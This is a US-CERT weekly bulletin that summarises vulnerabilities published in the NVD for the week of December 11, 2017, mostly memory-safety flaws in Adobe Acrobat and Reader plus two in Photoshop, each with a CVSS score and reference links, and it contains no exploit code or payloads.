SB17-352: Vulnerability Summary for the Week of December 11, 2017

Original release date: December 18, 2017

The US-CERT Cyber Security Bulletin provides a summary of new vulnerabilities that have been recorded by the National Institute of Standards and Technology (NIST) National Vulnerability Database (NVD) in the past week. The NVD is sponsored by the Department of Homeland Security (DHS) National Cybersecurity and Communications Integration Center (NCCIC) / United States Computer Emergency Readiness Team (US-CERT). For modified or updated entries, please visit the NVD, which contains historical vulnerability information.

The vulnerabilities are based on the CVE vulnerability naming standard and are organized according to severity, determined by the Common Vulnerability Scoring System (CVSS) standard. The division of high, medium, and low severities correspond to the following scores:

  • High - Vulnerabilities will be labeled High severity if they have a CVSS base score of 7.0 - 10.0

  • Medium - Vulnerabilities will be labeled Medium severity if they have a CVSS base score of 4.0 - 6.9

  • Low - Vulnerabilities will be labeled Low severity if they have a CVSS base score of 0.0 - 3.9

Entries may include additional information provided by organizations and efforts sponsored by US-CERT. This information may include identifying information, values, definitions, and related links. Patch information is provided when available. Please note that some of the information in the bulletins is compiled from external, open source reports and is not a direct result of US-CERT analysis.

 

High Vulnerabilities

Primary
Vendor -- Product
DescriptionPublishedCVSS ScoreSource & Patch Info
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a use after free vulnerability in the MakeAccessible plugin, when creating an internal data structure. The mismatch between an old and a new object can provide an attacker with unintended memory access -- potentially leading to code corruption, control-flow hijack, or an information leak attack. Successful exploitation could lead to arbitrary code execution.2017-12-099.3CVE-2017-16360
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of an out of bounds read vulnerability in the MakeAccesible plugin, when handling font data. It causes an out of bounds memory access, which sometimes triggers an access violation exception. Attackers can exploit the vulnerability by using the out of bounds access for unintended reads, writes, or frees, potentially leading to code corruption, control-flow hijack, or an information leak attack.2017-12-099.3CVE-2017-16362
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a buffer over-read in the module that handles character codes for certain textual representations. Invalid input leads to a computation where the pointer arithmetic results in a location outside valid memory locations belonging to the buffer. An attack can be used to obtain sensitive information, such as object heap addresses, etc.2017-12-099.3CVE-2017-16363
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This issue is due to an untrusted pointer dereference when handling number format dictionary entries. In this scenario, the input is crafted in way that the computation results in pointers to memory locations that do not belong to the relevant process address space. The dereferencing operation is a read operation, and an attack can result in sensitive data exposure.2017-12-099.3CVE-2017-16364
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a buffer over-read in the True Type2 Font parsing module. A corrupted cmap table input leads to a computation where the pointer arithmetic results in a location outside valid memory locations belonging to the buffer. An attack can be used to obtain sensitive information, such as object heap addresses, etc.2017-12-099.3CVE-2017-16365
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a type confusion overflow vulnerability. The vulnerability leads to an out of bounds memory access. Attackers can exploit the vulnerability by using the out of bounds access for unintended reads or writes -- potentially leading to code corruption, control-flow hijack, or an information leak attack.2017-12-099.3CVE-2017-16367
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability leads to a stack-based buffer overflow condition in the internal Unicode string manipulation module. It is triggered by an invalid PDF file, where a crafted Unicode string causes an out of bounds memory access of a stack allocated buffer, due to improper checks when manipulating an offset of a pointer to the buffer. Attackers can exploit the vulnerability and achieve arbitrary code execution if they can effectively control the accessible memory.2017-12-099.3CVE-2017-16368
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs because of a computation that reads data that is past the end of the target buffer; the computation is a part of the JavaScript engine. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-099.3CVE-2017-16370
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This issue is due to an untrusted pointer dereference in the JavaScript engine. In this scenario, the input is crafted in a way that the computation results in pointers to memory locations that do not belong to the relevant process address space. The dereferencing operation is a read operation, and an attack can result in sensitive data exposure.2017-12-099.3CVE-2017-16371
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This issue is due to untrusted pointer dereference in the JavaScript API engine. In this scenario, the JavaScript input is crafted in way that the computation results with pointer to memory locations that do not belong to the relevant process address space. The dereferencing operation is a read operation, and an attack can result with sensitive data exposure.2017-12-099.3CVE-2017-16372
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This issue is due to an untrusted pointer dereference. In this scenario, the input is crafted in way that the computation results in pointers to memory locations that do not belong to the relevant process address space. The dereferencing operation is a read operation, and an attack can result in sensitive data exposure.2017-12-099.3CVE-2017-16373
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a buffer over-read in the JPEG 2000 module. An invalid JPEG 2000 input code stream leads to a computation where the pointer arithmetic results in a location outside valid memory locations belonging to the buffer. An attack can be used to obtain sensitive information, such as object heap addresses, etc.2017-12-099.3CVE-2017-16374
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This issue is due to an untrusted pointer dereference in the JavaSscript API engine. In this scenario, the JavaScript input is crafted in way that the computation results in pointers to memory locations that do not belong to the relevant process address space. The dereferencing operation is a read operation, and an attack can result in sensitive data exposure.2017-12-099.3CVE-2017-16375
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is a part of the MakeAccessible plugin. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-099.3CVE-2017-16376
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is due to a computation that accesses a pointer that has not been initialized in the main DLL. In this case, a computation defines a read from an unexpected memory location. Therefore, an attacker might be able to read sensitive portions of memory.2017-12-099.3CVE-2017-16377
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is due to a computation that accesses a pointer that has not been initialized; the computation occurs during internal AST thread manipulation. In this case, a computation defines a read from an unexpected memory location. Therefore, an attacker might be able to read sensitive portions of memory.2017-12-099.3CVE-2017-16378
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a type confusion overflow vulnerability in the graphics rendering engine.2017-12-099.3CVE-2017-16379
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a security bypass vulnerability for a certain file-type extension. Acrobat maintains both a blacklist and whitelist (the user can specify an allowed attachment). However, any file extensions that are neither on the blacklist nor the whitelist can still be opened after displaying a warning prompt.2017-12-099.3CVE-2017-16380
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a buffer access with an incorrect length value when processing TIFF files embedded within an XPS document. Crafted TIFF image input causes a mismatch between allocated buffer size and the access allowed by the computation. If an attacker can adequately control the accessible memory then this vulnerability can be leveraged to achieve arbitrary code execution.2017-12-099.3CVE-2017-16381
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is part of the image conversion module. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-099.3CVE-2017-16382
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a heap overflow vulnerability when processing a JPEG file embedded within an XPS document.2017-12-099.3CVE-2017-16383
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a buffer over-read in the exif processing module for a PNG file (during XPS conversion). Invalid input leads to a computation where pointer arithmetic results in a location outside valid memory locations belonging to the buffer. An attack can be used to obtain sensitive information, such as object heap addresses, etc.2017-12-099.3CVE-2017-16384
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a buffer access with an incorrect length value in TIFF parsing during XPS conversion. Crafted TIFF image input causes a mismatch between allocated buffer size and the access allowed by the computation. If an attacker can adequately control the accessible memory then this vulnerability can be leveraged to achieve arbitrary code execution.2017-12-099.3CVE-2017-16385
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is part of the XPS2PDF conversion engine. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-099.3CVE-2017-16386
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is part of the JPEG2000 codec. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-099.3CVE-2017-16387
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a use after free vulnerability in the JavaScript API engine. The mismatch between an old and a new object can provide an attacker with unintended memory access -- potentially leading to code corruption, control-flow hijack, or an information leak attack. Successful exploitation could lead to arbitrary code execution.2017-12-099.3CVE-2017-16388
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a use after free vulnerability in the JavaScript engine. The mismatch between an old and a new object can provide an attacker with unintended memory access. Successful exploitation could lead to arbitrary code execution.2017-12-099.3CVE-2017-16389
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a use after free vulnerability in the JavaScript engine API. The mismatch between an old and a new object can provide an attacker with unintended memory access -- potentially leading to code corruption, control-flow hijack, or an information leak attack. Successful exploitation could lead to arbitrary code execution.2017-12-099.3CVE-2017-16390
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is a result of untrusted input that is used to calculate an array index; the calculation occurs in the printing functionality. The vulnerability leads to an operation that can write to a memory location that is outside of the memory addresses allocated for the data structure. The specific scenario leads to a write access to a memory location that does not belong to the relevant process address space.2017-12-099.3CVE-2017-16391
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a buffer access with an incorrect length value in the JPEG processing module. Crafted input with an unexpected JPEG file segment size causes a mismatch between allocated buffer size and the access allowed by the computation. If an attacker can adequately control the accessible memory then this vulnerability can be leveraged to achieve arbitrary code execution.2017-12-099.3CVE-2017-16392
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a use after free vulnerability in the JavaScript engine. The mismatch between an old and a new object can provide an attacker with unintended memory access -- potentially leading to code corruption, control-flow hijack, or an information leak attack. Successful exploitation could lead to arbitrary code execution.2017-12-099.3CVE-2017-16393
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is a part of the WebCapture module. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-099.3CVE-2017-16394
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a buffer access with an incorrect length value in the image conversion module when processing Enhanced Metafile Format (EMF). Crafted EMF input (EMR_STRETCHDIBITS) causes a mismatch between allocated buffer size and the access allowed by the computation. If an attacker can adequately control the accessible memory then this vulnerability can be leveraged to achieve arbitrary code execution.2017-12-099.3CVE-2017-16395
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a buffer access with an incorrect length value in the TIFF processing module. Crafted input causes a mismatch between allocated buffer size and the access allowed by the computation. If an attacker can adequately control the accessible memory then this vulnerability can be leveraged to achieve arbitrary code execution.2017-12-099.3CVE-2017-16396
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is a part of Enhanced Metafile Format (EMF) processing within the image conversion module. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-099.3CVE-2017-16397
BID
SECTRACK
CONFIRM
adobe -- acrobatAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a use after free vulnerability in the JavaScript engine. The mismatch between an old and a new object can provide an attacker with unintended memory access -- potentially leading to code corruption, control-flow hijack, or an information leak attack. Successful exploitation could lead to arbitrary code execution.2017-12-099.3CVE-2017-16398
BID
SECTRACK
CONFIRM
adobe -- acrobatAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This issue is due to an untrusted pointer dereference in the XPS parsing module. In this scenario, the input is crafted in a way that the computation results in pointers to memory locations that do not belong to the relevant process address space. The dereferencing operation is a read operation, and an attack can result in sensitive data exposure.2017-12-099.3CVE-2017-16399
BID
SECTRACK
CONFIRM
adobe -- acrobatAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is part of the JPEG 2000 parser. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-099.3CVE-2017-16400
BID
SECTRACK
CONFIRM
adobe -- acrobatAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is part of an image conversion, specifically in Enhanced Metafile Format Plus (EMF +) processing modules. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-099.3CVE-2017-16401
BID
SECTRACK
CONFIRM
adobe -- acrobatAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is a part of the JPEG 2000 module. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-099.3CVE-2017-16402
BID
SECTRACK
CONFIRM
adobe -- acrobatAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is part of the image conversion module that processes Enhanced Metafile Format Plus (EMF+) data. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-099.3CVE-2017-16403
BID
SECTRACK
CONFIRM
adobe -- acrobatAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a computation that writes data past the end of the intended buffer; the computation is part of processing Enhanced Metafile Format Plus (EMF+). The vulnerability is a result of an out of range pointer offset that is used to access sub-elements of an internal data structure. An attacker can potentially leverage the vulnerability to corrupt sensitive data or execute arbitrary code.2017-12-099.3CVE-2017-16404
BID
SECTRACK
CONFIRM
adobe -- acrobatAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is part of Acrobat's page display functionality. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-099.3CVE-2017-16405
BID
SECTRACK
CONFIRM
adobe -- acrobatAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a type confusion vulnerability in the EMF processing module. The issue causes the program to access an object using an incompatible type, leading to an out of bounds memory access. Attackers can exploit the vulnerability by using the out of bounds access for unintended reads, writes, or frees -- potentially leading to code corruption, control-flow hijack, or information leak attack.2017-12-099.3CVE-2017-16406
BID
SECTRACK
CONFIRM
adobe -- acrobatAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a computation that writes data past the end of the intended buffer; the computation is part of handling an EMF EMR_BITBLT record. The vulnerability is a result of an out of range pointer offset that is used to access sub-elements of an internal data structure. An attacker can potentially leverage the vulnerability to corrupt sensitive data or execute arbitrary code.2017-12-099.3CVE-2017-16407
BID
SECTRACK
CONFIRM
adobe -- acrobatAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is a part of the WebCapture module. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-099.3CVE-2017-16408
BID
SECTRACK
CONFIRM
adobe -- acrobatAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is part of the Adobe graphics module responsible for displaying textual data. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-099.3CVE-2017-16409
BID
SECTRACK
CONFIRM
adobe -- acrobatAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is a result of untrusted input that is used to calculate an array index; the calculation occurs in the image conversion module, when processing GIF files. The vulnerability leads to an operation that can write to a memory location that is outside of the memory addresses allocated for the data structure. The specific scenario leads to a write access to a memory location that does not belong to the relevant process address space.2017-12-099.3CVE-2017-16410
BID
SECTRACK
CONFIRM
adobe -- acrobatAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is part of the WebCapture module, related to an internal hash table implementation. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-099.3CVE-2017-16411
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs because of a computation that reads data that is past the end of the target buffer; the computation is part of the XPS conversion module, when handling a JPEG resource. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-099.3CVE-2017-16412
BID
SECTRACK
CONFIRM
adobe -- acrobatAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a computation that writes data past the end of the intended buffer; the computation is part of the XPS to PDF conversion module, when processing TIFF files. The vulnerability is a result of an out of range pointer offset that is used to access sub-elements of an internal data structure. An attacker can potentially leverage the vulnerability to corrupt sensitive data or execute arbitrary code.2017-12-099.3CVE-2017-16413
BID
SECTRACK
CONFIRM
adobe -- acrobatAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is a part of the JavaScript API module responsible for form field computation. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-099.3CVE-2017-16414
BID
SECTRACK
CONFIRM
adobe -- acrobatAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a computation that writes data past the end of the intended buffer; the computation is a part of the functionality that handles font encodings. The vulnerability is a result of out of range pointer offset that is used to access sub-elements of an internal data structure. An attacker can potentially leverage the vulnerability to corrupt sensitive data or execute arbitrary code.2017-12-099.3CVE-2017-16415
BID
SECTRACK
CONFIRM
adobe -- acrobatAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a computation that writes data past the end of the intended buffer; the computation is part of the image conversion module that handles Enhanced Metafile Format Plus (EMF+) data. The vulnerability is a result of an out of range pointer offset that is used to access sub-elements of an internal data structure. An attacker can potentially leverage the vulnerability to corrupt sensitive data or execute arbitrary code.2017-12-099.3CVE-2017-16416
BID
SECTRACK
CONFIRM
adobe -- acrobatAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is a part of the font parsing module. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-099.3CVE-2017-16417
BID
SECTRACK
CONFIRM
adobe -- acrobatAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is a part of the image conversion module that handles XPS files. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-099.3CVE-2017-16418
BID
SECTRACK
CONFIRM
adobe -- acrobatAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is in the part of the JavaScript engine that handles annotation abstraction. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-099.3CVE-2017-16420
BID
SECTRACK
CONFIRM
adobe -- photoshopAn issue was discovered in Adobe Photoshop 18.1.1 (2017.1.1) and earlier versions. An exploitable memory corruption vulnerability exists. Successful exploitation could lead to arbitrary code execution.2017-12-097.5CVE-2017-11303
BID
SECTRACK
CONFIRM
adobe -- photoshopAn issue was discovered in Adobe Photoshop 18.1.1 (2017.1.1) and earlier versions. An exploitable use-after-free vulnerability exists. Successful exploitation could lead to arbitrary code execution.2017-12-097.5CVE-2017-11304
BID
SECTRACK
CONFIRM
Back to top

 

Medium Vulnerabilities

Primary
Vendor -- Product
DescriptionPublishedCVSS ScoreSource & Patch Info
adobe -- acrobatAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a security bypass vulnerability when handling XFDF files.2017-12-094.3CVE-2017-16361
BID
SECTRACK
CONFIRM
adobe -- acrobatAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a security bypass vulnerability in the AcroPDF plugin.2017-12-095.0CVE-2017-16366
BID
SECTRACK
CONFIRM
